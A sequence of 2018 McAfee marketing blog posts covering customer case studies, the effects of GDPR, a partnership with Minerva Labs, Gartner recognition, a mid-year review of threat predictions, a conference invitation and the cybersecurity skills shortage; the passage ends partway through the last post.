“Whether on premises or in the cloud, we can easily add or customize policies to meet the security needs of each specific contract and project,” the systems analyst said. “McAfee has made it very easy to bring in new workloads.” For example, one of the company’s projects involves multiple federal agencies and multiple types of workloads. These workloads include SQL and Oracle databases, imaging software (since volumes of documents must be stored digitally for years), and agency-specific and contract-specific applications.

The real challenge of securing the cloud

So, what is the difficult part of securing the public cloud?

According to the systems analyst, “The biggest challenge is overcoming the perception that the cloud can’t be secured. We have had to educate both internally and externally that we can extend our existing threat defenses beyond our physical infrastructure to the public cloud. Education is ongoing, but our success thus far at securely leveraging the public cloud is converting the naysayers.”

To read a case study and learn about how the company relies on McAfee to secure the cloud, click here. To watch a video of the systems analyst talking about his experience with McAfee, please view below.

The post Extending Security to the Public Cloud is the Easy Part appeared first on McAfee Blogs.

‘Together is Power’ Means Collaboration https://securingtomorrow.mcafee.com/business/together-is-power-means-collaboration/ https://securingtomorrow.mcafee.com/business/together-is-power-means-collaboration/#respond Mon, 01 Oct 2018 16:16:37 +0000 https://securingtomorrow.mcafee.com/?p=91695


Crozer-Keystone Health System in Pennsylvania comprises five hospitals and operates several outpatient centers, a sports club, and a comprehensive physician network of primary-care and specialty practices. Systems Engineer Michael Mize works daily to protect the sensitive data of thousands of patients served by more than 1,000 physicians and 6,000 total employees. Mize has seen first-hand how the threat landscape has evolved over time and is adapting priorities accordingly.  

To be effective today, security teams must get more efficient. Mize incorporates the advanced capabilities of technology into the SOC to help staff work more productively. For example, by moving to McAfee Endpoint Security (ENS) 10, machine learning will help block malicious threats, freeing up security professionals to focus on higher-level tasks. But Mize also understands the value of building a comprehensive culture of security to create a truly secure environment. “’Together is power’ to me means collaboration,” says Mize. Crozer-Keystone brings this to life by working with other security professionals across the industry but also by focusing on educating its own employees. 

Mize describes a good day as one when users proactively reach out after receiving something they think might be a phishing attempt. Developing this kind of security-first mindset among staff doesn’t come automatically, so it’s good to see results from their training and reinforcement efforts. His team releases a monthly IT security bulletin on specific topics, such as phishing or physical security. In addition, the company provides a toll-free IT Security Incident hotline for reporting any suspicious problems and encourages unusual issues be reported to anyone in IT. 

Crozer-Keystone also partners with other organizations, attending events like MPOWER, to learn more about the security landscape and understand what solutions are available. Mize says it’s important to collaborate with others in the same situation to help his team better understand what they’re doing right, where they can improve and what both parties can do together moving forward. To illustrate this, whenever he encounters an outside organization with a user who has had their email account hacked – via a phishing email that reached his system, for example – he calls their help desk to connect with his peer at their business. He then describes what he’s observed and provides instructions for how he recommends they correct the issue.  

“I do this as a courtesy because we should all be looking out for each other even though it may take a few minutes out of our day. Maybe other security professionals will share this mindset and be more willing to help each other.” 

Hear more from Michael Mize on the impact of growing up with McAfee and how collaboration is making a difference at Crozer-Keystone in this video. 

The post ‘Together is Power’ Means Collaboration appeared first on McAfee Blogs.

Using Security-First Strategies to Keep Customer Data Safe https://securingtomorrow.mcafee.com/business/using-security-first-strategies-to-keep-customer-data-safe/ https://securingtomorrow.mcafee.com/business/using-security-first-strategies-to-keep-customer-data-safe/#respond Wed, 29 Aug 2018 17:01:53 +0000 https://securingtomorrow.mcafee.com/?p=91301


MGM Resorts International operates 27 resort properties worldwide, including more than 420 bars and restaurants and 282 retail establishments. SVP, Chief Information Security Officer Scott Howitt oversees security for the entire global enterprise, which encompasses 20,000 endpoints, various operating systems, and applications that span the gaming, hospitality, entertainment, food and beverage, retail and hotel industries. MGM Resorts International’s reputation rests heavily on keeping its customers’ data safe and secure.

Howitt and his team work relentlessly to block threats and mitigate risk as quickly and efficiently as possible. He has overseen the transformation of MGM Resorts International’s security ecosystem and continues to evolve it to stay ahead of ever-changing threats. Implementation of solutions such as McAfee Investigator and use of the Open Data Exchange Layer (OpenDXL) have reduced the time needed to block and remediate threats, keeping its businesses and customers safer. Howitt has also adopted some key strategies on top of these critical tools to help build a culture of security among his team.

Continually adapt and learn

Keeping ahead of zero-day attacks and new advanced threats requires a security infrastructure that continually gets smarter. By bringing in innovative technologies, such as machine learning and AI used by McAfee Investigator, MGM Resorts International’s defenses can adapt and learn to protect, detect, and correct faster.

Leverage technology that advances team learning

Using McAfee’s Investigator tool has also matured the team, helping them learn from each other. By providing greater continuity in the handoffs during an incident response process, everyone has a clearer view of the investigation, leading to increased efficiency. This also makes it easier to transfer knowledge from veteran staff to newer team members via the tool, advancing the team much faster.

Think longer term and build a layered defense architecture

The company has moved over the years from a security environment made up of a collection of point solutions to an adaptive ecosystem of interconnected security solutions and services that work together. McAfee Threat Intelligence Exchange and OpenDXL have supported Howitt in realizing this vision of a comprehensive, layered defense architecture. This approach not only helped build a more integrated security environment, but vendor consolidation saved money and simplified operational overhead.

Use the community

Once a quarter MGM Resorts International gathers representatives from McAfee and its three other major security partners to discuss possible use cases and how to leverage OpenDXL. Howitt admits their partners were hesitant at first to work closely with competitors, but they embraced it when they saw how working together could make their tools more efficient and powerful through collaboration. “… the more collaboration you have, the more likely you are to find better ways to use a tool or make it work better and be more secure,” says Howitt.

Learn more about how MGM Resorts International works with McAfee to make its businesses and customers safer using a security-first approach.

The post Using Security-First Strategies to Keep Customer Data Safe appeared first on McAfee Blogs.

Creating Ripples: The Impact and Repercussions of GDPR, So Far https://securingtomorrow.mcafee.com/business/data-security/creating-ripples-the-impact-and-repercussions-of-gdpr-so-far/ https://securingtomorrow.mcafee.com/business/data-security/creating-ripples-the-impact-and-repercussions-of-gdpr-so-far/#respond Tue, 28 Aug 2018 14:00:35 +0000 https://securingtomorrow.mcafee.com/?p=91106


“GDPR is coming, GDPR is coming!” For months this was all we heard – everyone was discussing GDPR’s impending arrival on May 25th, 2018, and what they needed to do to prepare for the new privacy regulation. GDPR – the General Data Protection Regulation – first came to fruition on April 14th, 2016, as a replacement for the EU’s former legislation, the Data Protection Directive. At its core, GDPR is designed to give EU citizens more control over their personal data. But in order for that control to be placed back in consumers’ hands, organizations have to change the way they do business. In fact, just five months after the implementation date, we’ve already seen GDPR leave an impact on companies. Let’s take a look at the ramifications that have already come to light because of GDPR, and how the effects of the legislation may continue to unfold in the future.

Even though the EU gave companies two years to ensure compliance, many waited until the last minute to act. So far, no one has been hit with the massive fines, but complaints are already underway. In fact, complaints have been filed against Google, Facebook, and its subsidiaries Instagram and WhatsApp. Plus, Max Schrems’s None of Your Business (NOYB) and the French association La Quadrature du Net have been busy filing complaints all around Europe. “Data Protection officials have warned us that they will be aggressively enforcing the GDPR, and they watch the news reports. European Economic Area (EEA) residents are keenly aware of the Regulation and its requirements, and are actively filing complaints,” said Flora Garcia, McAfee’s lead privacy and security attorney, who managed our GDPR Readiness project.

However, the ramifications are not just monetary, as the regulation has already affected some organizations’ user bases, as well as customer trust. Take Facebook, for example – the social network actually attributes the loss of 1 million monthly active users to GDPR, as reported in its second-quarter earnings. Then there’s British Airways, which claims that in order to provide online customer service and remain GDPR compliant, its customers must post personal information on social media. Even newspapers’ readership has been cut down by the legislation, as publications such as the Los Angeles Times and Chicago Tribune stopped allowing European readers access to their sites in order to avoid risk. “This is the new normal, and all companies need to be aware of their GDPR obligations. Companies outside of the EEA who handle EEA data need to know their obligations just as well as the European companies,” Garcia says.

GDPR has had tactical repercussions too; for instance, it has changed how the IT sector communicates about the way it stores customer data. A consumer’s ‘right to be forgotten’ means organizations have to clearly explain how a customer’s data has been removed from internal systems when the customer selects this option, while also ensuring a secure backup copy remains. GDPR also completely changes the way people view encrypting and/or anonymizing personal data.

What’s more, according to Don Elledge, guest author for Forbes, GDPR is just the tip of the iceberg when it comes to regulatory change. He states, “In 2017, at least 42 U.S. states introduced 240 bills and resolutions related to cybersecurity, more than double the number the year before.” This is largely due to the visibility of big data breaches (Equifax, Uber, etc.), which has made data protection front-page news, awakening regulators as a result. And with all the Facebook news, the Exactis breach, and the plethora of data leaks we’ve seen so far this year, 2018 is trending in the same direction. In fact, the California Consumer Privacy Act of 2018, which will go into effect January 1st, 2020, is already being called the next GDPR. Additionally, Brazil signed a Data Protection Bill in mid-August, which is inspired by GDPR and is expected to take effect in early 2020. The principles are similar, and potential fines could near 12.9 million USD. And both China and India are currently working on data protection legislation of their own as well.

So, with GDPR already creating ripples of change and new, similar legislation coming down the pipeline, it’s important now more than ever that companies and consumers alike understand how a piece of data privacy legislation affects them. Beyond that, companies must plan accordingly so that their business can thrive while remaining compliant.

To learn more about GDPR and data protection, be sure to follow us at @McAfee and @McAfee_Business, and check out some of our helpful resources on GDPR.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post Creating Ripples: The Impact and Repercussions of GDPR, So Far appeared first on McAfee Blogs.
Minerva’s Anti-Evasion Platform as Part of the McAfee Ecosystem https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/minervas-anti-evasion-platform-as-part-of-the-mcafee-ecosystem/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-partners/minervas-anti-evasion-platform-as-part-of-the-mcafee-ecosystem/#respond Fri, 24 Aug 2018 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=91223

This blog was written by Lenny Zeltser, VP of Products at Minerva Labs.

What drives two endpoint security vendors to work together? The recognition that customers will benefit from the unique advantages of each company’s technologies. Useful defensive approaches that work in tandem are stronger together than they are when deployed independently. With this in mind, Minerva’s Anti-Evasion Platform is now certified by McAfee to work within the ePO ecosystem. Here’s why this is valuable for McAfee and Minerva customers.

Using Deception to Increase Prevention Efficacy

Despite the modern advancements in antivirus approaches, such as the use of artificial intelligence, attackers keep succeeding at slipping past such enterprise defenses. That’s the nature of the cat-and-mouse dynamics, which describe any approach that aims to distinguish between malicious and legitimate files. Minerva’s Anti-Evasion Platform uses a different approach to automatically prevent infections that involve evasion tactics.

The notion that the effectiveness of cybersecurity tools decreases over time is captured in Grobman’s Curve. Steve Grobman, the CTO for McAfee, developed this principle to explain that advancements in security technologies indirectly weaken their own efficacy by motivating attackers to develop evasive countermeasures. Minerva’s Anti-Evasion Platform’s methodology operates in a way that compensates for this degradation.

Minerva’s approach doesn’t involve scanning files or tracking processes to detect malicious code. Therefore, it doesn’t compete with or replace the need for antivirus software such as McAfee Endpoint Security. Instead, Minerva’s Anti-Evasion Platform uses elements of deception on the endpoint to cause malware to self-convict and terminate itself if it engages in evasive behavior.

For example, Minerva’s software makes every endpoint in the enterprise look like the analysis environment that malicious code is often designed to avoid. This aspect of the solution is called Hostile Environment Simulation. This is just one of the ways in which Minerva automatically prevents intrusions without requiring human intervention, manual configuration or professional services.

Minerva forces adversaries to make a choice: use evasion and be subject to Minerva’s interference, or avoid such tactics and get caught by antivirus. As a result, McAfee Endpoint Security, augmented with Minerva’s Anti-Evasion Platform, delivers significantly broader threat coverage than any other solution on the market.

Using Evasion Tactics Against the Adversary

As the McAfee Labs Threat Report that focused on evasion pointed out, “There are hundreds, if not thousands, of anti-security, anti-sandbox, and anti-analyst evasion techniques employed by malware authors. Many can be purchased off the shelf.” Gone are the days when attackers needed to possess advanced expertise to use such technologies.

Tactics for bypassing anti-malware tools eventually yield results, leading to costly investigative activities and losses associated with the compromise of sensitive data. Minerva’s focus on interfering with evasion methods is unusual in that the more evasive the threat, the easier it is for Minerva’s Anti-Evasion Platform to prevent the compromise.

For instance, Minerva examined the extent to which evasion tactics are used by modern exploit kits. We analyzed the points in the attack paths that involved some form of evasion, such as the avoidance of malware analysis tools. 99% of the examined attacks involved at least one evasion tactic somewhere along the path. Such techniques are designed to increase the likelihood that the attack succeeds. In contrast, the very use of evasion as part of the attack allows Minerva’s Anti-Evasion Platform to protect endpoints even if other security controls would’ve failed.

With Minerva, the very tactics that have historically given adversaries the upper hand give defenders an advantage in protecting endpoints.

Enhanced Protection without Operational Burdens

The passive nature of Minerva’s technology allows customers to benefit from its protection without endpoint performance concerns. Moreover, Minerva’s integration with ePolicy Orchestrator (ePO) allows McAfee customers to deploy and operate Minerva’s Anti-Evasion Platform without operational burdens often associated with standalone agents.

It’s now possible to deploy Minerva via McAfee ePO software for all Microsoft Windows operating systems (Windows XP or above, including servers) across the enterprise. No reboot is required for installing, upgrading or uninstalling the Minerva agent. McAfee customers can also use ePO to centrally monitor the evasive threats prevented by Minerva’s Anti-Evasion Platform and feed that new threat intelligence onward.

In another example of Minerva working together with McAfee technologies, Minerva’s agent can interact with other components of the McAfee ecosystem using the Data Exchange Layer (DXL), which allows DXL-compatible solutions to collaborate on strengthening enterprise defenses. For instance, if Minerva’s Anti-Evasion Platform stops an evasive threat, Minerva can use DXL to share information about the malicious artifact with other DXL-compatible technologies. Minerva’s video illustrates this approach in action.

Minerva’s participation in the McAfee ecosystem increases the efficacy of the joint solution to stop attacks. The ePO integration allows enterprises to accomplish this easily and efficiently. DXL makes it possible to share Minerva’s unique advantage with other compatible technologies and reinforces the notion that security is a team sport. To see this approach in action, reach out to Minerva for a demo.

About Minerva Labs

Minerva Labs is an award-winning, innovative endpoint security solution provider that protects enterprises from today’s stealthiest attacks, without the need to detect threats first—all before any damage has been done. The Minerva Anti-Evasion Platform blocks unknown threats that evade existing defenses by deceiving the malware and controlling how it perceives its environment.

About McAfee

McAfee is the device-to-cloud cybersecurity company. Inspired by the power of working together, McAfee creates business and consumer solutions that make our world a safer place for the benefit of all. McAfee’s holistic, automated open security platform allows all your disparate products to co-exist, communicate, and share threat intelligence with each other anywhere in the digital landscape.

About Author

Lenny Zeltser is a seasoned business and tech leader with extensive cybersecurity experience. He heads Product Management at Minerva Labs. Lenny also trains incident response and digital forensics professionals at SANS Institute. He has earned the prestigious GIAC Security Expert designation, has an MBA from MIT Sloan and a Computer Science degree from the University of Pennsylvania.

The post Minerva’s Anti-Evasion Platform as Part of the McAfee Ecosystem appeared first on McAfee Blogs.

Brazilian Educational Organization Gets High Marks for Innovation Leadership with Integrated Security from McAfee https://securingtomorrow.mcafee.com/business/brazilian-educational-organization-gets-high-marks-for-innovation-leadership-with-integrated-security-from-mcafee/ https://securingtomorrow.mcafee.com/business/brazilian-educational-organization-gets-high-marks-for-innovation-leadership-with-integrated-security-from-mcafee/#respond Wed, 15 Aug 2018 13:00:55 +0000 https://securingtomorrow.mcafee.com/?p=90765

Furthering the cause of education in Brazil is the mission that fuels SOMOS Educação’s laser-focused drive toward technology and innovation—and McAfee is playing a pivotal role in that transformation. As CIO Juliano Pereira points out, “Compared to 99% of the educational organizations in Brazil, we are way ahead of the game”—and, in large part, it’s a result of embracing McAfee’s connected security ecosystem.

As one of the biggest K through 12 educational groups in Brazil, SOMOS Educação provides a comprehensive portfolio of integrated educational textbooks, digital products, and services, including the administration of preparatory courses and exams. The organization’s push toward innovation is evidenced by its recent migration of instructional systems and applications to the cloud. And, alongside that effort, SOMOS Educação, with enthusiastic support from its board of directors, is making a significant investment in strengthening, unifying, and streamlining its security architecture at every touch point—servers, endpoints, and databases.

CIO Juliano Pereira and his lean team of devoted and seasoned IT and security professionals are determined to ensure a more secure and consistent experience for the students who use their services, their parents, and SOMOS Educação’s 5,500 employees, who are distributed across 50 locations nationwide. Personal privacy, data protection, and building a solid and reliable defense against advanced threats like the recent WannaCry ransomware outbreak top their list of security priorities.

To that end, Pereira and his team selected McAfee as the organization’s primary security vendor, primarily because of the McAfee integrated approach to security and the simple, single-pane-of-glass management capabilities via the McAfee ePolicy Orchestrator (McAfee ePO) console. The organization started its journey with McAfee by deploying McAfee Endpoint Security, which provides a single platform with an array of defenses—everything from web protection to ensure safe browsing to scanning that uncovers vulnerabilities to behavioral analysis and machine learning to detect advanced and zero-day threats.

Next on the agenda was implementation of McAfee DLP Endpoint, which has had a marked impact on the organization’s culture and on those who make use of its educational services. Pereira has made a point of informing all the organization’s constituents about these added data security controls as a way of heightening security awareness among employees and giving external users greater peace of mind. “Students and their parents will feel more at ease, and employees will be more mindful about the way they use and transmit data,” says Pereira.

At the heart of SOMOS Educação’s updated security architecture is the McAfee ePO console (video below), which has considerably elevated the security team’s efficiency and capabilities by consolidating management tasks, facilitating enforcement of data protection policies, and offering an unprecedented level of visibility and reporting. As an example, Pereira points out that the McAfee ePO console revealed that McAfee had thwarted 1,065 threats in a week’s time.

Migration of student services to the cloud, which Pereira sees as both inevitable and necessary, prompted him to adopt McAfee Web Protection, which provides consistent protection and policies both on premises and in the cloud.

SOMOS Educação’s journey to innovation and better cybersecurity has just begun, but already the organization has made great strides. Pereira and his team are proud of the progress they’ve made so far and look forward to expanding the depth and breadth of their cutting-edge cybersecurity architecture and to serving as an example for other organizations in the education sector.

“We are at the beginning of our journey, and we still have far to go before we achieve all our goals, but we take pride in the fact that we are leading the way when it comes to cybersecurity. When our schools hear that we are providing them with stronger security, they are really pleased and receptive,” affirms Pereira.

To read the full case study, click here.

The post Brazilian Educational Organization Gets High Marks for Innovation Leadership with Integrated Security from McAfee appeared first on McAfee Blogs.

Gartner Peer Insights Recognition for McAfee SIEM https://securingtomorrow.mcafee.com/business/security-operations/gartner-peer-insights-recognition-for-mcafee-siem/ https://securingtomorrow.mcafee.com/business/security-operations/gartner-peer-insights-recognition-for-mcafee-siem/#respond Wed, 01 Aug 2018 21:03:46 +0000 https://securingtomorrow.mcafee.com/?p=90634

This blog was written by Peter Elliman.

I’m proud to say that McAfee has received recognition from our customers with the 2018 Gartner Peer Insights Customers’ Choice for Security Information and Event Management (SIEM). This is a recognition of high satisfaction from a number of reviews by verified end-user professionals. To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

If you don’t know much about our SIEM product — McAfee Enterprise Security Manager (ESM) — I encourage you to read a blog post published back in March (Is Your SOC Caught in the Slow Lane) for more details. ESM 11 is a modern SIEM, which we define as having an open and scalable data architecture, advanced analytical capabilities and the ability to quickly enrich and share relevant data.

And while Gartner has named McAfee a Leader in the “Magic Quadrant for Security Information and Event Management (SIEM)” over the past 7 years ¹, something that makes us proud, we are most appreciative of our customers who support our technologies and share their opinions through forums like Gartner Peer Insights. We believe the voice and passion of our customers is critical to our success and motivates us each day.

McAfee’s corporate tag line is “Together is Power.” We are stronger when we work together – with customers and partners. Put another way, we recognize that organizations, and in this context security operations teams, use a wide range of tools, which is why our Security Operations platform, which includes our SIEM, is strengthened by the many partners in our Security Innovation Alliance (SIA). Time to value is important when bringing new tools into a customer environment. And while we know many companies want to reduce the number of tools used in their environment, research shows 25% of security events go unanalyzed, and 39% of cybersecurity organizations manually collect, process, and analyze external intelligence feeds. That means there is room for solutions like ESM, which can reduce complexity, improve critical security outcomes such as mean time to detection and mean time to respond, and efficiently address critical compliance requirements.

Gartner Peer Insights Customers’ Choice distinctions are determined by the subjective opinions of individual end-user customers based on their own experiences, the number of published reviews on Gartner Peer Insights, and overall ratings for a given vendor in the market, as further described here, and are not intended in any way to represent the views of Gartner or its affiliates.

¹Gartner Magic Quadrant for Security Information and Event Management, Kelly M. Kavanagh, Toby Bussa, 4 December 2017. From 2015-16, McAfee was listed as Intel Security, and in 2011, McAfee was listed as Nitro Security since it acquired the company in 2011.   

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

The post Gartner Peer Insights Recognition for McAfee SIEM appeared first on McAfee Blogs.

Checking In Halfway: The McAfee Labs 2018 Threats Predictions https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/checking-in-halfway-the-mcafee-labs-2018-threats-predictions/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/checking-in-halfway-the-mcafee-labs-2018-threats-predictions/#respond Tue, 26 Jun 2018 18:26:25 +0000 https://securingtomorrow.mcafee.com/?p=90125

Time flies when you’re fighting cybercrime. Now that’s not exactly how the phrase goes, but for us at McAfee, it’s hard to believe that we’re already almost halfway through 2018. It seems like just yesterday we were predicting the types of cyberthreats we would see throughout this year with our McAfee Labs 2018 Threats Predictions Report. From the machine learning arms race to the home becoming the ultimate storefront, it looked like we had quite a year ahead of us. But in reality, not all of these predictions came to fruition. And conversely, some unraveled in ways we didn’t imagine. Let’s take a look at which predictions became reality, and what may still lie ahead for the cybersecurity industry in 2018.

The First Half of 2018

Ransomware Pivots to New Targets, New Objectives

The Prediction

In November of last year, we predicted 2018 was going to be colored by ransomware attacks that were anything but ordinary. These attacks could pivot away from traditional, individual extortion, and rather aim to sabotage or disrupt organizations.

The Verdict

Ransomware attacks have indeed pivoted. Last year we witnessed the WannaCry ransomware attacks, which spread like wildfire to hundreds of thousands of devices, but this year’s ransomware attacks have reshaped their focus, moving away from the individual attack entirely. With disruption as an objective, these attacks managed to shut down both critical and personal services. As of June 2018, an Ohio police and fire department, a Minnesota psychiatric provider, and even a family planning clinic have all been victims of a ransomware attack, proving threat actors will stop at almost nothing in order to cause a bit of chaos.

The Adversarial Machine Learning Arms Race Revs Up

The Prediction

Late last year, our Labs team discussed how the influence of machine learning will be felt on both sides of the equation – white hats will ramp up their AI/ML defenses, while cybercriminals will tap into the technology’s power to enact advanced attacks. With machines working for anyone, an arms race would be fueled, and machine-supported actions would increase from both defenders and attackers.

The Verdict

Machine learning and AI are very present in the arsenal of cyber defenders, as the industry has become fairly successful at applying AI to malware detection and user and entity behavior analytics (UEBA) by using deep neural networks and anomaly detection. In fact, the use of this technology and application of human-machine teaming has been cited as a reason top talent will accept a job at a cybersecurity firm in the first place. However, we have yet to see them actively leveraged by cybercriminals in attacks this year.

In lieu of AI, attacks in 2018 have instead used more traditional techniques, but for non-traditional purposes. Just take Operation Honeybee as an example – the attack leveraged malicious documents, typically considered an older attack vector, but set its sights on a unique type of target: humanitarian aid groups. Honeybee also ladders back to a larger trend seen throughout the first half of this year – threats have new targets, and certainly new objectives.

When Your Home Becomes the Ultimate Storefront

The Prediction

The growth of smart home devices is nothing new, but the way they are leveraged by corporations has changed over time. We predicted that 2018 would be no exception: the companies creating these devices have powerful incentives to observe what consumers are doing in their homes and learn from their behaviors. We foresaw these corporations exploring new ways to capture consumer data and adjusting terms and conditions in order to avoid being fined.

The Verdict

The monetization and use of consumer data have been huge topics of discussion in 2018, but not because of the IoT industry yet. Rather, the now infamous Facebook Cambridge Analytica incident stirred up quite the debate earlier this year around what companies are doing with consumer data.

In 2018, IoT devices are being used to spy, but not by corporations. Cybercriminals continue to use vulnerable IoT devices to their advantage, scooping up data and spying on families by exploiting device vulnerabilities. From smart TVs to baby monitors, the handful of IoT attacks in 2018 have shown that these devices still have a long way to go when it comes to a solid security posture.

The Next Six Months

Serverless Apps: New Opportunities for Friend and Foe

The Prediction

Cybercriminals will take advantage of convenient opportunities as they arise, which is precisely why our team predicted that threat actors will jump on serverless apps this year, using their greater granularity as a chance to increase the attack surface and steal data in transit across a network.

The Verdict 

As of now, major attacks against serverless apps have yet to be seen. Mind you, they could soon become a reality: researchers have recently shown how to turn serverless functions into crypto-mining resources. Those researchers are the exception, though. Many IT professionals do not yet understand the technology or the cyber risk that comes with it, and that lack of understanding can itself be the biggest risk of all. In fact, many security professionals lack the basic skills required to understand and secure this technology.

Inside Your Child’s Digital Backpack

The Prediction

Children are being introduced to the internet and tech devices earlier than ever before. As exciting as that is, most kids are not properly trained on how to surf the web safely, which can put their privacy at risk. This exposure led us to predict that in 2018 organizations would begin to collect and leverage digital content generated by children, and that parents would be unaware of how much information about their kids is out there.

The Verdict

Though there has been no known incident yet in which a child's information has been leveraged or compromised, some apps and gadgets have the potential to enable one. It was recently reported that a new app popular with kids allows other users to track them by GPS. According to McAfee research, children's online gaming use could also put them at serious risk of a cyberattack.

Beyond these predictions, there is a variety of other threats security professionals could be facing in the second half of 2018. Just take VPNFilter, Hidden Cobra, and Gold Dragon as examples: all of these campaigns have proven that cybercriminals have come into 2018 swinging. They are going after high-profile, high-stakes industries, and are using deceptive and sly techniques in order to steal information from these targets.

Needless to say, the threat landscape is going to continue to change and evolve throughout 2018. However, no matter how the rest of the year unfolds, we’re confident that cyber defenders are ready to take on any future threat that may come their way.

Hear from our leading researchers from McAfee Labs and Office of the CTO as they share more details into the threat landscape predictions for 2018 in our on-demand webinar.

To learn more about what McAfee is doing to help tackle today’s cyberthreats, be sure to follow us at @McAfee and @McAfee_Labs.

The post Checking In Halfway: The McAfee Labs 2018 Threats Predictions appeared first on McAfee Blogs.

Finals Week: Cloud Edition https://securingtomorrow.mcafee.com/business/cloud-security/finals-week-cloud-edition/ Tue, 05 Jun 2018 23:00:07 +0000

It’s almost summertime—where the nights are longer and the water is warmer! Before we head to the beach it’s time to review all the things we learned about the cloud from the past two quarters.

For #CloudFinalsWeek we’re asking you to prove your knowledge on the current climate of cloud computing and security. Will you be valedictorian or be headed back to class for summer school? Share your cloud finals score on Twitter after completing the assessment to see if you outranked your peers.


Not prepared? Lucky for you this is an “open-book” test. Find some cheat sheets and study guides below.

Report: Navigating a Cloudy Sky

Blog Post: Cloud is Ubiquitous and Untrusted

Good luck!

The post Finals Week: Cloud Edition appeared first on McAfee Blogs.

Come Talk to McAfee at the Gartner Security and Risk Management Summit https://securingtomorrow.mcafee.com/business/come-talk-to-mcafee-at-the-gartner-security-and-risk-management-summit/ Mon, 04 Jun 2018 18:56:44 +0000

This blog was written by Peter Elliman.

A wide group of experts from McAfee will be attending the Gartner Security & Risk Management Summit from June 4-7 in National Harbor, Maryland. The summit brings together an estimated 3400 attendees and over 200 exhibitors looking to share their vision, stories and capabilities with a wider range of cybersecurity and risk management experts. Personally, I’m looking forward to sessions on Security Operations, Management and Orchestration,

Join us on Tuesday, June 5th from 10:30-11:15, for a session entitled Appetite for Destruction – The Cloud Edition, given by Rajiv Gupta, SVP of the Cloud Security Business Unit and Raj Samani (@Raj_Samani), Chief Scientist and McAfee Fellow. Raj and Rajiv will examine the evolving threat landscape in 2018 and how the cloud will increasingly come under fire.

Looking to hear more about our view on cloud security? One of our system engineers, Will Aranha, a DC native from Skyhigh, now part of McAfee, will give a great session entitled Cloud Security in the Era of "There's an App for That." While it takes place on Monday, June 4th, the same day this blog was published, swing by the booth if you want a summary or a follow-up on the slides he presented. If you're reading this in time, head to George's Hall D by 1:50pm.

Speaking of our booth, I have to encourage you to visit McAfee at booth #436. Talking to experts 1:1 is one of the best ways to get educated and answer questions. My hope is that you’ll walk away with a bigger and broader vision of what McAfee can do. We call it our Device to Cloud protection vision.

Better yet see live demos of both updated and new products. We’ll have 4 stations centered on the following:

Endpoint Security – Protecting against advanced and fileless threats is important, but you also need context on threat trends (not just EDR) and the ability to respond quickly and efficiently (a single security management console, ePO, makes that easier). Find out what the new McAfee is doing differently in this space.

Evolve Your Security Operations – Wondering why you can’t get more out of your SIEM? Wish you had a few more tier 2 or tier 3 security analysts on staff? See how analytics and machine-learning can transform how every analyst, regardless of their level, can find threats and make decisions faster. Here’s a screen shot from our Mock SOC demo that gives you a taste of how both McAfee Behavior Analytics and McAfee Investigator can transform your team.

McAfee Behavioral Analytics (MBA) screen shot that shows a high-risk user and the reason for the rating. MBA uses machine-learning to model users and organizational behavior.

The beginning of an investigation with McAfee Investigator as shown in the mock SOC demo (the red box highlights a guided investigation). Turns an analyst into a real Sherlock Holmes.

Data Center & Cloud Defense – If you're like most enterprises, you've got some workloads running in a hybrid cloud. The team here will show you how to make protection fast and easy through things like automated workload and container discovery, cloud-optimized threat defense, and network visibility and micro-segmentation. A recent SANS endpoint survey (a multi-vendor effort) showed the network as one of the top three areas where respondents detected compromises.

McAfee Skyhigh Security Cloud (CASB) – Your teams are working in the cloud, which makes securing the places where they work (e.g., Office 365, AWS, Azure, Box, Salesforce, Slack, and others) important. The team will help you better understand everything from DLP to collaboration control policies to detecting compromised accounts in cloud environments.

Click here to find out how MGM Resorts International uses McAfee solutions, including the McAfee SIEM and Investigator products, to significantly reduce detection and response times. Select benefits included:

  • Improved security posture through well-orchestrated integration and intelligence sharing
  • Accelerated time and reduced effort to contain, investigate, and remediate advanced threats
  • Improved collaboration and skills of security investigation team

Stop by our booth (#436) to hear about more customers and use cases. If you can’t make it to the show, I encourage you to reach out to learn more about the innovation occurring at the new McAfee.

The post Come Talk to McAfee at the Gartner Security and Risk Management Summit appeared first on McAfee Blogs.

The Ramifications of the Skills Shortage on Cloud Security https://securingtomorrow.mcafee.com/business/cloud-security/the-ramifications-of-the-skills-shortage-on-cloud-security/ Wed, 30 May 2018 15:00:54 +0000

Week over week, a new threat against valuable data emerges. Sometimes, adversaries in cybersecurity find ways to infiltrate systems through advanced malware strains. Other times, they’ll find holes in an organization’s infrastructure, which have been accidentally created by a well-intentioned employee. Both occur all too often, but the latter is actually tied to another threat facing the cybersecurity industry – the skills shortage.

Mind the gap

The skills shortage is a term those in the industry are all too familiar with. While agile and powerful threats are on the rise, the number of talented cybersecurity professionals is not, leaving a gaping hole in security strategy that existing employees just can't fill. In fact, according to McAfee's recent study Winning the Game, IT leaders report needing to increase their security staff by 24% to adequately manage their organization's cyberthreats. The absence of adequately trained professionals can leave holes in many aspects of modern-day security infrastructure, and one of the widest is cloud security.

A clouded education

